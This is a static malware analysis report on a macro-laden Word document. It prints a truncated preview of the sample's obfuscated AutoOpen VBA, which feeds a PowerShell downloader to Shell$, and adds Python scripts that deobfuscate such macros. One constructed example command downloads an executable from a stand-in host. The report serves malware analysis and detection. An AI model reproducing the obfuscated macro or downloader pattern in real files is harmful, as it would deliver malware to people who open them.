Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21f7f3749e8dd4ea…

MALICIOUS

Office (OLE)

Size: 182.0 KB
Created: 2017-12-14 17:02:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 679d87d5d7ad52436d12a165a693dd99
SHA-1: 43b34cd3f3d7d3b5b77b1feca75f8295c797364e
SHA-256: 21f7f3749e8dd4ea478a98b7380fc82884f294fd4a8ef707b0c98002ce4287b1
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Word (OLE) document whose VBA project contains an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled. AutoOpen passes the return value of a helper function (rTVzdkwwIpTEWE in the extracted source) to VBA.Shell$; that function assembles the command from Mid() slices of longer string literals, interleaved with IsNull() expressions that only pad the code. The visible slices carry PowerShell syntax: [cHar]N sums and -replacE operations that, for example, turn the token MEZ ([cHar]77+[cHar]69+[cHar]90) into $ ([cHar]36), which is how the fragment MEZenv:publ stands for an environment-variable reference, plus repeated filler tokens (4bP+4bP, Xoj+Xoj) that the VBA layer inserts into every literal. This is consistent with a downloader obfuscated at both the VBA and the PowerShell layer, the usual pattern for fetching and running further malicious content; because the preview is truncated, the full command line and any download URL are not recoverable from this page. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' likewise points to a phishing lure with dropper functionality. The legacy WordBasic heuristic below describes the case in which no VBA project is recovered; olevba did recover the VBA source here, so that finding adds nothing beyond the AutoOpen marker already reported.
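To turn the macro pattern described above into something reproducible, here is a small static-analysis script, added as an example (it is not the report's tooling and not oletools code). It reads decoded VBA source of the kind olevba writes to macros.bas, finds the name AutoOpen hands to Shell$, evaluates the helper function's Mid() slices in return order, and removes the repeated TOKEN+TOKEN filler. The VBA it runs on is constructed to mirror this sample's layout; the command it contains is a benign stand-in, and the helper names (gJpQ, p1, p2), the `<name> = a + b` return convention and the 3-character filler assumption are mine, not taken from the page.

```python
"""Static recovery of the command an AutoOpen macro passes to Shell().

Pattern handled (the one in this sample): AutoOpen() calls VBA.Shell$ on the
value returned by a helper Function; that Function is padded with IsNull()
lines and builds the real string from Mid() slices of longer literals, which
carry repeated TOKEN+TOKEN filler. Assumptions (mine, not from the report):
the helper returns via `<name> = a + b + ...`, literals contain no doubled
quotes, filler tokens are 3 characters long and occur at least twice.
"""
import re

# Constructed VBA modelled on the sample's layout; the command is a benign
# stand-in made up for this example, not the sample's payload.
SAMPLE_VBA = r'''
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
aQw = "ZcvjwEq" + "pLkDsQ" + "HyTr"
VBA.Shell$ gJpQ, 0
bRt = "qwErTy" + "uIoP"
End Sub
Function gJpQ()
n1 = IsNull("OctUiilz") + IsNull("itwqbpU")
p1 = Mid("XXXXpow4bP+4bPersheXoj+Xojll -w hidden -c YYYY", 5, 38)
n2 = IsNull("znroSOKd") + IsNull("pRIcsvB")
p2 = Mid("Qstart-prXoj+Xojocess calc.exe4bP+4bPZZ", 2, 36)
gJpQ = p1 + p2
End Function
'''

MID_RE = re.compile(r'^\s*(\w+)\s*=\s*Mid\(\s*"([^"]*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)', re.I)


def vba_mid(s, start, length):
    """VBA Mid(): start is 1-based."""
    return s[start - 1:start - 1 + length]


def proc_body(vba, kind, name):
    """Lines between `Sub|Function name(` and the matching End line."""
    m = re.search(rf'^{kind}\s+{re.escape(name)}\s*\(.*?\n(.*?)^End {kind}',
                  vba, re.S | re.M | re.I)
    return m.group(1).splitlines() if m else []


def shell_callee(vba):
    """Name passed to Shell / Shell$ inside AutoOpen (a variable or a Function)."""
    body = "\n".join(proc_body(vba, "Sub", "AutoOpen"))
    m = re.search(r'\bShell\$?\s*\(?\s*(\w+)', body)
    return m.group(1) if m else None


def rebuild_return(vba, fname):
    """Evaluate the Mid() slices in fname and join them in return order."""
    lines = proc_body(vba, "Function", fname)
    pieces = {}
    for ln in lines:
        if "IsNull(" in ln:          # padding; carries no data
            continue
        m = MID_RE.match(ln)
        if m:
            pieces[m.group(1)] = vba_mid(m.group(2), int(m.group(3)), int(m.group(4)))
    ret = re.compile(rf'^\s*{re.escape(fname)}\s*=\s*(.+)$', re.I)
    for ln in lines:
        m = ret.match(ln)
        if m:
            return "".join(pieces.get(n.strip(), "") for n in m.group(1).split("+"))
    return ""


def filler_tokens(s, min_hits=2):
    """Tokens written as ABC+ABC and repeated through the string are padding."""
    counts = {}
    for tok in re.findall(r'([A-Za-z0-9]{3})\+\1', s):
        counts[tok] = counts.get(tok, 0) + 1
    return sorted(t for t, c in counts.items() if c >= min_hits)


def strip_filler(s):
    for tok in filler_tokens(s):
        s = s.replace(f"{tok}+{tok}", "")
    return s


def recover_command(vba):
    """Return (callee name, raw reassembled string, string with filler removed)."""
    callee = shell_callee(vba)
    raw = rebuild_return(vba, callee) if callee else ""
    return callee, raw, strip_filler(raw)


if __name__ == "__main__":
    callee, raw, cmd = recover_command(SAMPLE_VBA)
    print("Shell() argument comes from Function", callee)
    print("raw    :", raw)
    print("filler :", filler_tokens(raw))
    print("command:", cmd)
```

The filler detector keys on the `ABC+ABC` shape rather than a fixed token list, so it also picks up tokens that differ from this sample's 4bP and Xoj; raise min_hits if a legitimate command happens to contain a repeated pair. On real output, treat the recovered string as the next layer to decode, not as the final payload.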

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://Xoj+Xojhillbod4bP+4bPyXoj+Xoj.comXo    In document text (OLE body)
    • http://yag4bP+4bP20X70ujz4quAFGl    In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main    In document text (OLE body)
    Note: the first two URLs contain the same filler tokens (4bP+4bP, Xoj+Xoj) as the macro's string literals, so they are fragments of obfuscated text rather than usable network indicators; do not block or hunt on them literally. The schemas.openxmlformats.org URL is the standard DrawingML namespace and is expected in Office documents.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 78804 bytes
SHA-256: 7e6f43805582de1be6b3117acb3727fc569e285e50a2466f29f2e04fe20cd9ce
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ikYMYMbGLAzp"
Sub AutoOpen()
SzbjojIYvizlZN = "ajsWqEdIjCjcY" + "QWmzkdzXdQkNo" + "jQYwaSBBtdI" + "orriIHjkfINmo" + "sCDclcQBYTii" + "GlPdIqu" + "IfzIdiDwbClJq" + "wwRrjZmSXz" + "EdwQfFvtvkX" + "UHwMEzR" + "YLjmQLRKVBpHz" + "ZAEjwzqPvpbu"
jhMiVGHBswLzTn = "YtvPDmizIXAT" + "JQrLWPh" + "ITTAshjEshc" + "FqBtMrKB" + "EKVnErbFAdEG" + "QacOKFBt" + "qXJzTPwwi" + "jrDIwNn" + "EzrEYDwZbRwjF" + "rpUzdHYMHCwzZQ" + "RdAXPzuXl" + "GAtojAwwhANoBk"
RrrpFYdfMJn = "JpCzSizWGfYaBA" + "sQzccPr" + "FChfacVjisCoIi" + "vFDNZlT" + "nFXlPNjLh" + "rwvkCXulw" + "hzLsNNDWYCSMlk" + "aCrFTzhVWRiHLD" + "TnnZjotfXBJ" + "mfzfKKqc" + "CjfvAdoafG" + "TsifZMBFjXUEJ"
upXmXwUbLRHHd = "KFEsuRqtzUGw" + "kvwibWHG" + "RoHKXshRXRiSv" + "ScKswAsCjZm" + "fOiflWcWnQkk" + "zMfwoQrpUiGRd" + "FvPIiXnM" + "isjLpYnCr" + "wAnNFrIvuLk" + "OHMWaYHCMGl" + "wEHEBQhbOriJSi" + "QZbsBhGd"
VBA.Shell$ rTVzdkwwIpTEWE, 0
zSwOupNsPt = "AjEtddINX" + "DErPrckNjMp" + "iFiSThYdmuY" + "IjUhOYYsF" + "vOGzDMcifjaZBz" + "LKbouqJf" + "GKICzLnzVl" + "UMUdMAHO" + "rifVWDNwELGmi" + "stEZfUsdEPpq" + "qwctiunhYimjww" + "sJfXmfbkHbcuz"
dQffEXwbS = "suzUORtjWB" + "vkSETONUSGzo" + "uOGAsbsRq" + "irfHWpht" + "zdhjNbkIkG" + "SsGjZzL" + "qvITFdnNnHrfk" + "aqpMitYHS" + "KpomkzhW" + "oCdpKcCZOwB" + "bQFRQqNRRUjcA" + "PoBcoZUA"
KzBikfTKLRPiZj = "UIUFMUSBoB" + "OYmHbYbTu" + "PLclwJXKlZ" + "FhHfEPocsvMdW" + "uYDqrHGpz" + "wrTNKvq" + "bXJricW" + "nrCYCiGU" + "lUUuSjP" + "CiMvaRwFJBzI" + "taTiUOn" + "DOlwJYaWIJo"
End Sub
Function rTVzdkwwIpTEWE()
mQWBClwtSVs = IsNull("WRkzUzoVCkIf") + IsNull("VFtwiFkEk") + IsNull("OuUwaRwZO") + IsNull("ZnTbaiRt") + IsNull("RwEQmTccf") + IsNull("mRdmEVDzz") + IsNull("DGLtVoimS")
IpkRfRPT = IsNull("OctUiilzXMn") + IsNull("itwqbpU") + IsNull("YbBYNVXbOL") + IsNull("olwIiGPsUfqFW") + IsNull("VSpEzbqUnIn") + IsNull("VGNHKkLXwPh") + IsNull("UjMwzphVivsC")
QccLF = Mid("Xc4Nw5lar]77+[cHar]69+[cHar]90),[cH4bP+4bPar]36 -replacE ([cHar]49+[cHar]109+[cHar]76),[cHar]92  -repl4bP+4bPacE ([cHar]104bP+4bP1+[cHar]113+[cHar]14bP+4bP15),[cHar]39) 4bP+4bcRE2XKbK2ij", 8, 168)
ilCNIqroWlL = IsNull("znroSOKdif") + IsNull("pRIcsvBPGXiSfM") + IsNull("nLvzlpKG") + IsNull("wapUpLZRT") + IsNull("OpCRdsjXM") + IsNull("UVMcGaz") + IsNull("ktIfKrdRGjZv")
jNNVvaiOK = IsNull("daGbClRCZQmH") + IsNull("jnhzbzoQsOzJK") + IsNull("VADEtlLpjdid") + IsNull("qLRJTzcYjzDOJ") + IsNull("SlLHSrAwCWM") + IsNull("VjqDETzKwEaEf") + IsNull("iMoAzpkI")
vQkiWUnbVq = IsNull("NwPzWltSFESwFz") + IsNull("ONNPLrhaHji") + IsNull("nLlzzREH") + IsNull("wikoFQipph") + IsNull("uADtTKj") + IsNull("jYHOraG") + IsNull("UEUhBpHR")
BTAVpBw = Mid("w  4bPQ0V4bP,[chaR'+'baRRjGjjaBLj2G95Wiw", 2, 20)
CifMASPKUXa = IsNull("EYVMlmtJvzadw") + IsNull("dukRziNKHcIJ") + IsNull("IBWWINmlfiGLX") + IsNull("uiHEfmf") + IsNull("GPYliftQ") + IsNull("DcwlIYaRQJvzLd") + IsNull("bZSjzXc")
OQuMij = IsNull("LwHwhnwkNL") + IsNull("EMzwfDIZl") + IsNull("wtRaGmN") + IsNull("fStFcIiGjLqwi") + IsNull("RVbMqHMiS") + IsNull("sVNDqXbB") + IsNull("shtVwkpOZWwi")
VfINHjJEM = IsNull("JzvGwXiGsO") + IsNull("CjZTmFhmPdjNu") + IsNull("TJENNRVaFpnN") + IsNull("cthCDjWaW") + IsNull("GfaSlNt") + IsNull("jAUfOitizT") + IsNull("dkfZnEshafi")
siRGZLmoXtB = Mid("PcXGcSJjM3BnLSm0oj+Xoj;MEZkXoj+XojarXoj+Xojapas = MEZnsaXoj+XojdasXoj+X'+'ojd.Xoj+Xojnex4bP+4bPtXoj+Xoj(Xoj'+'+Xoj1, Xoj+Xoj3Xoj+Xoj43245);MEZhuXo'+'j+XojasXoj+Xoj = MEZenv:publARX9TrB7", 17, 161)
TbkjadX = IsNull("UjbwztwFfBAn") + IsNull("GvfPJkpOq") + IsNull("YzdcBtnIVYFA") + IsNull("buYhFiMjshl") + IsNull("tiJNLsYiDDw") + IsNull("RvMstiPHGR") + IsNull("VkDkjdA")
sVNOdQw = IsNull("qqEfQsJVZj") + IsNull("LhNUdDKpEz") + IsNull("XZPJntf") + IsNull("XfqUfhwoHF") + IsNull("vfIZXWZQ") + IsNull("NjjcXmSfPG") + IsNull("PqCIoUM")
qvHGzOd = IsNull("RrwHKduJfhW") + IsNull("YzCQJSUnNSi") + IsNull("cfocIHoACX"
... (truncated)
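The string slices in the preview use PowerShell's [char] casts and -replace operator: a token such as MEZ is spelled as [cHar]77+[cHar]69+[cHar]90 and later swapped for [cHar]36 ('$') by a -replacE, 1mL ([cHar]49+[cHar]109+[cHar]76) becomes a backslash ([cHar]92), and quoted text is split with '+'. The decoder below, added here as an example (not the report's tooling and not the sample's own code), folds the [char] sums into text, rejoins the split literals and applies each -replace in order. It assumes the VBA-level filler (4bP+4bP, Xoj+Xoj) has already been removed and that the complete command is available; because the preview is truncated, the input is a constructed command in the same style (the example.invalid host is a reserved, non-resolving name), not the sample's payload. The function names are mine.

```python
"""Decode PowerShell obfuscated with [char] arithmetic and chained -replace.

Input is the command string after VBA-level filler has been stripped. The
pattern handled: a single-quoted literal, possibly split with '+', followed
by one or more `-replace (pattern),(replacement)` operations whose operands
are [char]N sums or quoted literals.
"""
import re

# Constructed command in the style of the fragments (MEZ = '$', 1mL = '\',
# eqs = single quote). Not the sample's payload; example.invalid is reserved.
SAMPLE_PS = (
    "(('MEZwc = new-ob'+'ject System.Net.WebClient; MEZp = MEZenv:public; "
    "MEZwc.DownloadFile(eqshttp://example.invalid/a.exeeqs, MEZp + eqs1mLa.exeeqs)') "
    "-replacE ([cHar]77+[cHar]69+[cHar]90),[cHar]36 "
    "-replacE ([cHar]49+[cHar]109+[cHar]76),[cHar]92 "
    "-replacE ([cHar]101+[cHar]113+[cHar]115),[cHar]39)"
)

CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.I)
# one -replace; pattern and replacement each given as (...), '...' or [char]N
REPLACE_RE = re.compile(
    r"-replace\s+(\([^)]*\)|'[^']*')\s*,\s*(\([^)]*\)|'[^']*'|\[char\]\s*\d+)",
    re.I,
)


def eval_char_expr(expr):
    """'[cHar]77+[cHar]69+[cHar]90' -> 'MEZ'; [char] is matched case-insensitively."""
    return "".join(chr(int(n)) for n in CHAR_RE.findall(expr))


def parse_operand(text):
    """A -replace operand: quoted literal, or (parenthesised) [char] sum."""
    text = text.strip()
    if text.startswith("(") and text.endswith(")"):
        text = text[1:-1].strip()
    if len(text) >= 2 and text[0] == text[-1] == "'":
        return text[1:-1]
    return eval_char_expr(text)


def decode_powershell(cmd):
    """Return (decoded string, [(pattern, replacement), ...]), or None."""
    # 'ab'+'cd' is the same literal as 'abcd'; rejoin before anything else
    cmd = re.sub(r"'\s*\+\s*'", "", cmd)
    lit = re.search(r"'([^']*)'", cmd)
    if not lit:
        return None
    payload = lit.group(1)
    steps = []
    # PowerShell applies -replace left to right and each step sees the previous
    # result. The patterns here are plain text, so a literal replace suffices;
    # a real -replace is regex-based, so use re.sub for patterns with metacharacters.
    for pat, rep in REPLACE_RE.findall(cmd[lit.end():]):
        p, r = parse_operand(pat), parse_operand(rep)
        payload = payload.replace(p, r)
        steps.append((p, r))
    return payload, steps


if __name__ == "__main__":
    decoded, steps = decode_powershell(SAMPLE_PS)
    for p, r in steps:
        print(f"-replace {p!r} -> {r!r}")
    print(decoded)
```

The order of the -replace chain matters: the quote substitute (eqs) is resolved last so that the earlier patterns never have to match across quote boundaries, which is also why decoding must mirror PowerShell's left-to-right evaluation rather than apply the mappings in any convenient order.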